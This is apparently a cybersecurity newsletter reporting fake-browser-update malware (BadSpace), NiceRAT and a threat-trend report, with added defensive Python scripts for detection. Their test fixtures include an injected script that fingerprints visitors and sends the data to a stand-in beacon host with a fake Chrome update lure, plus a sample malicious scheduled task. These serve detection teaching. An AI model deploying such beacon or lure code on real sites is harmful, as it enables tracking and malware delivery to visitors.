Malware via Fake Browser Updates

Jun 18 2024



Welcome to Gone Phishing, your daily cybersecurity newsletter that’s the Romania to cybercrime’s Ukraine 💀💀💀 #EURO2024

Today’s hottest cybersecurity news stories:

  • 🌌 BadSpace Windows backdoor delivered via legit websites 🎭

  • 🍜 South Korea targeted with NiceRAT via cracked software 💔

  • 😈 Electorate tricked by fake campaign emails soliciting donations 💸

Hackers: You have to take the good with the BadSpace 💀💀💀


🚨⚠️ Fake Browser Updates Deliver Malware! 🔍🖥️

Compromised Websites Spread BadSpace! 📦💀 Legitimate-but-compromised websites are being used to deliver a Windows backdoor named BadSpace under the guise of a browser update, according to German cybersecurity firm G DATA, which uncovered the scheme.

How It Works 🎭🔗

  1. Infected Website: The attack starts with a compromised site, often built on WordPress, into which malicious code has been injected.

  2. First Visit Logic: On a visitor's first visit, the injected code collects device info, IP address, user-agent and location and sends them to a hard-coded domain.

  3. Fake Update: The site then displays a fake Google Chrome update pop-up, which either drops the malware directly or fetches it through a JavaScript downloader.

  4. C2 Server Connection: The server involved is linked to SocGholish (aka FakeUpdates), a known JavaScript-based downloader.
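The chain above leaves a recognisable footprint in the page itself: a script that is not the site's own, a first-visit check, fingerprint collection that is sent to a hard-coded host, and lure text about a browser update. The following triage script is an added example (not G DATA's tooling and not from the original article) that pulls those signals out of a saved HTML page. The sample pages, the host names and the heuristics are constructed and assumed for this example; a "third-party script" hit is a review item, not proof of compromise.

```python
"""Triage a saved HTML page for the injected fake-update chain.

Added example, not G DATA's tooling. Sample pages, host names and the
heuristics below are constructed/assumed for this example:
  * a <script src> whose host is not the site's own host is "third-party";
  * an inline script that reads fingerprint APIs AND sends data out is a
    candidate first-visit beacon (the hard-coded host is extracted);
  * a cookie/localStorage check beside those is the first-visit gate;
  * text like "Chrome ... update" written into the page is a lure marker.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FINGERPRINT_RE = re.compile(r"navigator\.(userAgent|platform)|screen\.(width|height)|timeZone")
EXFIL_RE = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon\(|https?://")
FIRST_VISIT_RE = re.compile(r"localStorage|sessionStorage|document\.cookie")
LURE_RE = re.compile(r"(chrome|browser).{0,40}update", re.I)
HOST_RE = re.compile(r"https?://([\w.-]+)")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def triage(html, site_host):
    """Return (finding_kind, detail) tuples for one page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        host = urlparse(src).hostname
        if host and host != site_host and not host.endswith("." + site_host):
            findings.append(("third_party_script", host))
    for body in p.inline:
        fp = FINGERPRINT_RE.search(body) is not None
        ex = EXFIL_RE.search(body) is not None
        gate = FIRST_VISIT_RE.search(body)
        if fp and ex:  # collects device data and ships it somewhere
            dest = HOST_RE.search(body)
            findings.append(("fingerprint_beacon", dest.group(1) if dest else "dynamic-url"))
        if gate and (fp or ex):  # only fires once per visitor
            findings.append(("first_visit_gate", gate.group(0)))
        lure = LURE_RE.search(body)
        if lure:
            findings.append(("update_lure", lure.group(0)))
    return findings


# Constructed sample: a WordPress-style page with one injected inline script.
INJECTED_PAGE = """<html><head>
<script src="https://blog.example.org/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://static.example-cdn.net/lib.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
(function () {
  if (!localStorage.getItem("_v")) {
    localStorage.setItem("_v", "1");
    var d = { ua: navigator.userAgent, w: screen.width,
              tz: Intl.DateTimeFormat().resolvedOptions().timeZone };
    fetch("https://check.example-beacon.test/r?d=" + btoa(JSON.stringify(d)));
  }
  document.body.insertAdjacentHTML("beforeend",
    '<div class="upd">Your Chrome browser needs an update. Click to install.</div>');
})();
</script>
</head><body><p>Hello</p></body></html>"""

# Constructed sample: the same site without the injection.
CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body><p>Hello</p></body></html>"""

if __name__ == "__main__":
    for kind, detail in triage(INJECTED_PAGE, "blog.example.org"):
        print(f"{kind:20} {detail}")
```

Run it against a page fetched with a first-visit-looking client (fresh profile, residential egress, browser user-agent) as well as a repeat fetch; per step 2 above the injection may not render at all on the second visit, so a diff between the two fetches is itself a signal.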

BadSpace Capabilities 🔍⚙️

  • Anti-Sandbox Checks: Runs anti-sandbox checks to evade analysis environments.

  • Persistence: Sets up scheduled tasks.

  • Data Harvesting: Collects system info.

  • Command Execution: Runs commands via cmd.exe, reads/writes files, takes screenshots, and deletes scheduled tasks.
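Two of the capabilities listed above (persistence through scheduled tasks, and commands run through cmd.exe) land in the Windows Security log as task-creation events (4698) and task-deletion events (4699), whose TaskContent field carries the task's XML definition. The hunt below is an added example, not G DATA's detection logic and not part of the article; the events are constructed, the scoring heuristics (shell interpreter as the action, command line pointing into a user-writable directory, logon or boot trigger) are assumptions to tune for your estate.

```python
"""Hunt Windows Security events for scheduled-task persistence.

Added example, not G DATA's detection logic. Input is a list of events
(4698 = task created, 4699 = task deleted) reduced to the fields that
matter; the events below are constructed for this example. Heuristics
are assumptions: a task whose action is a shell interpreter, or whose
command line points into a user-writable directory, is reported, and a
later deletion of a reported task is reported too, since the backdoor
is described as deleting scheduled tasks as well as creating them.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
PERSIST_TRIGGERS = {"LogonTrigger", "BootTrigger", "RegistrationTrigger"}
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")  # exported task XML declares UTF-16


def parse_task(task_xml):
    """Return ([(command, arguments), ...], [trigger names]) from task XML."""
    root = ET.fromstring(XML_DECL.sub("", task_xml))
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append((cmd, args))
    trig = root.find("t:Triggers", NS)
    triggers = [c.tag.split("}")[-1] for c in trig] if trig is not None else []
    return actions, triggers


def assess(task_xml):
    """Reasons a task definition looks like malware persistence ([] if none)."""
    actions, triggers = parse_task(task_xml)
    reasons = []
    for cmd, args in actions:
        exe = PureWindowsPath(cmd.strip('"')).name.lower()
        blob = f"{cmd} {args}".lower()
        if exe in SHELLS:
            reasons.append(f"shell interpreter: {exe}")
        if any(d in blob for d in USER_WRITABLE):
            reasons.append("runs from user-writable path")
    if reasons:  # only add the trigger detail when something else already looks off
        reasons += [f"persists via {t}" for t in triggers if t in PERSIST_TRIGGERS]
    return reasons


def hunt(events):
    findings, flagged = [], set()
    for ev in events:
        if ev["EventID"] == 4698:
            reasons = assess(ev["TaskContent"])
            if reasons:
                flagged.add(ev["TaskName"])
                findings.append({"event": "created", "task": ev["TaskName"],
                                 "user": ev["SubjectUserName"], "reasons": reasons})
        elif ev["EventID"] == 4699 and ev["TaskName"] in flagged:
            findings.append({"event": "deleted", "task": ev["TaskName"],
                             "user": ev["SubjectUserName"],
                             "reasons": ["previously flagged task removed"]})
    return findings


# Constructed sample events (field subset of 4698/4699).
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>%windir%\system32\defrag.exe</Command>
    <Arguments>-c -h -k -g -$</Arguments>
  </Exec></Actions>
</Task>"""},
    {"EventID": 4698, "SubjectUserName": "alice", "TaskName": "\\Updater",
     "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c start "" "C:\Users\alice\AppData\Roaming\upd\loader.exe"</Arguments>
  </Exec></Actions>
</Task>"""},
    {"EventID": 4699, "SubjectUserName": "alice", "TaskName": "\\Updater", "TaskContent": ""},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["event"], f["task"], f["user"], "; ".join(f["reasons"]))
```

Event 4698/4699 logging is not on by default: the "Audit Other Object Access Events" subcategory must be enabled before these events exist to hunt in, and the same hunt can be run retrospectively over the task XML files under `C:\Windows\System32\Tasks`.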

Recent Warnings 🛡️🔔

eSentire and Sucuri have also reported campaigns using fake browser update lures to distribute information stealers and remote access trojans. Be cautious of unexpected browser update prompts: Chrome and the other major browsers update themselves through their own built-in updater, so a web page telling you to download an update is a lure by definition.

Stay alert and safeguard your systems! 🌐🔐

NiceRAT attack Cracks the Korean code 🐀🐀🐀

🚨 Malware Alert: NiceRAT Targeting South Korea! 🖥️

Cracked Software Spreading NiceRAT! 🚨📦 Threat actors are deploying a malware called NiceRAT to rope infected devices into a botnet. South Korean users are being targeted through cracked software, such as pirated copies of Microsoft Windows or tools that bypass Microsoft Office licence verification.

Sneaky Distribution Methods 🕵️‍♂️🎛️

AhnLab Security Intelligence Center (ASEC) reports that:

  • User Sharing: Crack programs shared among users spread the malware beyond the initial distributor.

  • Anti-Malware Removal Tips: The distributors guide users through removing anti-malware software, which hampers detection of the payload.

Botnet Distribution 📲🦠

In addition to cracked software, NiceRAT spreads via a botnet of zombie computers infiltrated by NanoCore RAT. This mirrors previous methods using Nitol DDoS malware to propagate Amadey Bot.

NiceRAT Capabilities and Development 🔍⚙️

  • Active Development: Open-source and written in Python.

  • Command-and-Control: Uses a Discord webhook as its C2 channel.

  • Sensitive Data Theft: Steals information from compromised hosts.

  • Versions: First released on April 17, 2024, now at version 1.1.0.

  • MaaS Model: Available as a premium version, indicating a Malware-as-a-Service offering.
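A Discord webhook as C2 means the implant's beacons are ordinary HTTPS POSTs to discord.com, which blend in wherever Discord is allowed. What still stands out is who is posting and how regularly. The script below is an added example (not ASEC's detection content and not from the original article) that scores webhook POSTs in web-proxy logs by process and by timing. The log format and lines are constructed for the example; the process allowlist and thresholds are assumptions to tune per environment.

```python
"""Flag Discord-webhook command-and-control in web-proxy logs.

Added example, not ASEC's detection content. The log format and the
lines below are constructed (ISO timestamp followed by key=value
fields); the process allowlist and thresholds are assumptions. Discord
webhook URLs have the shape https://discord.com/api/webhooks/<id>/<token>,
so the numeric id is a stable grouping key even when the token is redacted.
"""
import re
from collections import defaultdict
from datetime import datetime

WEBHOOK_RE = re.compile(r"https?://discord(?:app)?\.com/api/webhooks/(\d+)/")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Processes for which a webhook POST is plausibly user-driven (assumption).
ALLOWED_PROCS = {"discord.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def parse_line(line):
    ts, _, rest = line.partition(" ")
    fields = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def detect(lines, min_posts=3, jitter_tolerance=30):
    """Group webhook POSTs by (host, process, webhook id) and score each group."""
    posts = defaultdict(list)
    for line in lines:
        f = parse_line(line)
        m = WEBHOOK_RE.search(f.get("url", ""))
        if m and f.get("method") == "POST":
            posts[(f["host"], f.get("proc", "?").lower(), m.group(1))].append(f["ts"])
    findings = []
    for (host, proc, hook), stamps in sorted(posts.items()):
        reasons = []
        if proc not in ALLOWED_PROCS:
            reasons.append(f"non-browser process {proc} posting to a webhook")
        stamps.sort()
        if len(stamps) >= min_posts:
            gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
            reasons.append(f"{len(stamps)} posts to webhook {hook}")
            if max(gaps) - min(gaps) <= jitter_tolerance:  # machine-like cadence
                reasons.append(f"regular ~{sum(gaps) / len(gaps):.0f}s interval")
        if reasons:
            findings.append({"host": host, "proc": proc, "webhook_id": hook,
                             "count": len(stamps), "reasons": reasons})
    return findings


# Constructed proxy log: one scripted beacon, one real user on Discord.
SAMPLE_LOG = [
    "2024-06-17T09:12:03Z host=WS-0117 user=alice proc=python.exe method=POST "
    "url=https://discord.com/api/webhooks/111111111111111111/REDACTED status=204 bytes=1843",
    "2024-06-17T09:17:04Z host=WS-0117 user=alice proc=python.exe method=POST "
    "url=https://discord.com/api/webhooks/111111111111111111/REDACTED status=204 bytes=2210",
    "2024-06-17T09:22:05Z host=WS-0117 user=alice proc=python.exe method=POST "
    "url=https://discord.com/api/webhooks/111111111111111111/REDACTED status=204 bytes=1790",
    "2024-06-17T09:30:00Z host=WS-0042 user=bob proc=discord.exe method=GET "
    "url=https://discord.com/api/v9/users/@me status=200 bytes=512",
    "2024-06-17T10:01:11Z host=WS-0042 user=bob proc=chrome.exe method=POST "
    "url=https://discord.com/api/webhooks/222222222222222222/REDACTED status=204 bytes=300",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["host"], f["proc"], f["webhook_id"], f["count"], "; ".join(f["reasons"]))
```

The process name is the strongest single signal here: a Python interpreter (NiceRAT is written in Python) or a freshly unpacked "crack" binary has no business posting to a webhook. Where the proxy does not record the process, the timing check still works, and the webhook id can be fed back to Discord's abuse process to have the channel cut.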

Related Threats 🚨⛏️

Bondnet Botnet: A cryptocurrency mining botnet using high-performance miner bots as C2 servers since 2023, leveraging a modified Fast Reverse Proxy (FRP) tool.

Stay vigilant against unexpected software updates and always use trusted sources for downloads! 🌐🔐

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with! 🚀 Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." 🤓💡 That’s us, alright! 🤵 How about you? Visionary AI executive, much? 👀

And if the newsletter gets your motor running then you can take a butcher's at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business 🤖👩‍💻🌐

Rest assured, the process is very straightforward.

You simply:

🆕 Sign Up & Create Campaign

📊 Define your audience, budget, and message to captivate your audience.

🚀 Launch your campaign, as Presspool’s AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

🕵️ Finally, you leverage real-time analytics to track performance and refine future strategies. 📈 Elevate your marketing game and stay informed with! 🌟 Simples! 🦦 📰🏊🤖 may just have what you need to succeed. And if the product isn’t for you, the newsletter alone is a gamechanger. And we know newsletters 😉

Poll up, poll up! Read all about it 🗳️🗳️🗳️

🚨⚠️ Global Cyber Threat Surge! 🌍💻

Major Events Fuel Cyber Attacks! 📈🔍 Major regional and global events, including military exercises, political summits, and elections, have driven a surge in cyber threat activities, according to Trellix.

Cyber Threat Landscape 🌏🔥

John Fokker, Head of Threat Intelligence at Trellix, highlighted a “state of polycrisis” over the last six months, with radical shifts in cybercriminal behaviour. He emphasised the increasing complexity of cybersecurity and the need for operational threat intelligence to outpace cybercriminals.

China & Russia Lead Cyber Attacks 🏴‍☠

  • China: Volt Typhoon and other China-linked groups dominate APT activities, accounting for 68.3% of detections. 23% of their activity targets the global government sector.

  • Russia: Sandworm APT group saw a 40% increase in activity compared to the previous period.

  • Iran: Marked an 8% rise in cyber activities, aligned with geopolitical aims, including the Israeli-Hamas conflict.

Election Scams & Ransomware 🚨💸

  • Election Scams: Malicious emails trick consumers into donating to fake election campaigns using legitimate marketing services.

  • Ransomware: Transportation and shipping sectors faced the highest ransomware threat, with 53% and 45% of global detections in Q4 2023 and Q1 2024 respectively. The finance industry followed closely. Post-LockBit disruption, imposters emerged copying the group.

GenAI & Advanced Tools 🧠🔧

  • Cobalt Strike: Remains popular despite a 17% decrease in detections.

  • Terminator Tool: Used by Spyboy in January 2024, targeting the telecom sector, likely linked to the Russian-Ukrainian conflict.

  • GenAI Adoption: Free ChatGPT 4.0 Jabber tool helps cybercriminals incorporate GenAI, creating a knowledge base for learning and idea theft.

Geopolitical Motivations & Tool Shifts 🌐🔄

The dramatic increase in APT activities in certain countries reflects geopolitical motivations. The rise in “living off the land” tactics emphasises the challenge of distinguishing between legitimate and malicious activities.

Stay alert and informed to navigate these evolving cyber threats! 🔐🌍

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!
